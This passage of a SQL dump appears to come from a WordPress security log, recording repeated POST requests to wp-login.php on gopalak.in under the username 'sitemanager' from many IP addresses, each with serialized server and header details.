Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35502\";s:11:\"REMOTE_ADDR\";s:13:\"66.29.141.204\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747040622.985137;s:12:\"REQUEST_TIME\";i:1747040622;}}','66.29.141.204',0,'2025-05-12 14:33:44','1970-01-01 00:00:00'),(95650,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52934\";s:11:\"REMOTE_ADDR\";s:12:\"45.90.72.157\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747041023.6098969;s:12:\"REQUEST_TIME\";i:1747041023;}}','45.90.72.157',0,'2025-05-12 14:40:25','1970-01-01 00:00:00'),(95651,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51606\";s:11:\"REMOTE_ADDR\";s:15:\"161.248.201.171\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747041423.679507;s:12:\"REQUEST_TIME\";i:1747041423;}}','161.248.201.171',0,'2025-05-12 14:47:05','1970-01-01 00:00:00'),(95652,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45338\";s:11:\"REMOTE_ADDR\";s:14:\"103.169.35.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747041830.043062;s:12:\"REQUEST_TIME\";i:1747041830;}}','103.169.35.190',0,'2025-05-12 14:53:51','1970-01-01 00:00:00'),(95653,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55018\";s:11:\"REMOTE_ADDR\";s:14:\"103.173.227.63\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747042237.570585;s:12:\"REQUEST_TIME\";i:1747042237;}}','103.173.227.63',0,'2025-05-12 15:00:39','1970-01-01 00:00:00'),(95654,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59026\";s:11:\"REMOTE_ADDR\";s:14:\"164.90.225.186\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747042645.392822;s:12:\"REQUEST_TIME\";i:1747042645;}}','164.90.225.186',0,'2025-05-12 15:07:27','1970-01-01 00:00:00'),(95655,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50196\";s:11:\"REMOTE_ADDR\";s:12:\"163.61.72.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747043060.516093;s:12:\"REQUEST_TIME\";i:1747043060;}}','163.61.72.36',0,'2025-05-12 15:14:22','1970-01-01 00:00:00'),(95656,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40720\";s:11:\"REMOTE_ADDR\";s:13:\"63.250.38.213\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747043471.4655919;s:12:\"REQUEST_TIME\";i:1747043471;}}','63.250.38.213',0,'2025-05-12 15:21:13','1970-01-01 00:00:00'),(95657,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56394\";s:11:\"REMOTE_ADDR\";s:13:\"165.22.212.13\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747043887.077209;s:12:\"REQUEST_TIME\";i:1747043887;}}','165.22.212.13',0,'2025-05-12 15:28:08','1970-01-01 00:00:00'),(95658,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34806\";s:11:\"REMOTE_ADDR\";s:15:\"173.212.207.177\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747044300.7846;s:12:\"REQUEST_TIME\";i:1747044300;}}','173.212.207.177',0,'2025-05-12 15:35:02','1970-01-01 00:00:00'),(95659,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48392\";s:11:\"REMOTE_ADDR\";s:14:\"103.180.120.26\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747044712.2689991;s:12:\"REQUEST_TIME\";i:1747044712;}}','103.180.120.26',0,'2025-05-12 15:41:54','1970-01-01 